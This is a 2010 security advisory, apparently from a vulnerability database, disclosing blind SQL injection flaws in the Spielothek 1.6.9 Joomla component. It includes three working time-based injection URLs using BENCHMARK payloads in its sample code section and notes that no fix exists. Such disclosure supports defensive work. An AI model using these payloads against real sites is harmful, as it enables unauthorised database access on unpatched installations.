Spielothek 1.6.9 Joomla Component Multiple Blind SQL Injection
2010-08-09T00:00:00Type securityvulns
Reporter Securityvulns
Modified 2010-08-09T00:00:00
Description
Spielothek 1.6.9 Joomla Component Multiple Blind SQL Injection
Name Spielothek Vendor http://www.spielban.de Versions Affected 1.6.9
Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-07-31
X. INDEX
I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX
I. ABOUT THE APPLICATION
This component allows you to present your users a highscore-enabled game-area.It is based on the all known joomlaflashgames, but with more features and with better scoring method. You can create own categories for games and let your site-visitors have fun, so they will return.
II. DESCRIPTION
Some parameters are not properly sanitised before being used in SQL queries.
III. ANALYSIS
Summary:
A) Multiple Blind SQL Injection
A) Multiple Blind SQL Injection
Many parameters in various files such as battle.php, scores.php etc. are not properly sanitised before being used in SQL queries. Because of the number of flaws, I can't report the entire vulnerable code; but I can say that most of the numeric fields have not been properly checked.
IV. SAMPLE CODE
A) Multiple Blind SQL Injection
http://site/path/index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
V. FIX
No fix.
